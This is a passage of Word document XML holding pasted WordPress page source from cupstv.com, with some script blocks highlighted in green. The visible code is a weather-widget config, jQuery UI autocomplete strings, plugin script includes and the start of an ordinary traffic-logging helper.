          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/* &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CDATA[ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F7F64" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>WuWidget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = {"apiKey":"3ffab52910ec1a0e","_wpnonce":"cb605db8b7","ajaxurl":"http:\/\/cupstv.com\/wp-admin\/admin-ajax.php","is_admin":"","subdomain":"www"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B671C16" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/* ]]&gt; */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD3C07" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E4AFAF" w14:textId="77777777" w:rsidR="00667DEF" w:rsidRPr="00017C4C" w:rsidRDefault="00667DEF" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3534AFEE" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;script type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414E11C1" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/* &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CDATA[ */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C0036" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> uiAutocompleteL10n = {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>noResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>manyResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>":"%d results found. Use up and down arrow keys to navigate.","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>itemSelected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>":"Item selected."}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>;/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>* ]]&gt; */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671156C" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4FA92C" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;script type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' src='http://cupstv.com/wp-admin/load-scripts.php?c=0&amp;amp;load%5B%5D=jquery-core,jquery-migrate,jquery-ui-core,jquery-ui-widget,jquery-ui-position,jquery-ui-menu,wp-a11y,jquery-ui-autocomplete&amp;amp;ver=deb984409fe0013bff9f0c8d24c9c2fe'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19EE20" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;script type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' src='http://cupstv.com/wp-content/plugins/wunderground/assets/js/widget.min.js'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD12642" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='stylesheet' id='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wunderground-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>'  href</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>='http://cupstv.com/wp-content/plugins/wunderground/assets/css/wunderground.css' type='text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B56347" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE888F" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9DA20" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1C0FC" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>addEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8568B4" w14:textId="77777777"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r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>window.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E7D1B" w14:textId="77777777"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r>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E26C18" w14:textId="77777777"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t>} else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>window.attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7959B526" w14:textId="77777777"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r>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.attachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">'on' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01876A3F" w14:textId="77777777"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430394AE" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BADFA" w14:textId="77777777" w:rsidR="00017C4C" w:rsidRPr="00017C4C" w:rsidRDefault="00017C4C" w:rsidP="00017C4C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>removeEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>evt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE4229" w14:textId="77777777"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r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>window.removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713CFFED" w14:textId="77777777"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r>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>document.removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017C4C">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
